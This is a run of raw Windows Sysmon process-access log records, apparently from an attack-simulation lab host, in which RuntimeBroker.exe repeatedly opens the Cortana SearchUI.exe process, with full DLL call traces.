13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011927Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011926Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011925Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011924Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011923Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011922Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011921Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011920Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011919Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011918Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011917Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011916Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011915Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011914Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011913Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011912Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011911Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11166004C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011910Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11164744C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011909Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11164744C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011908Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 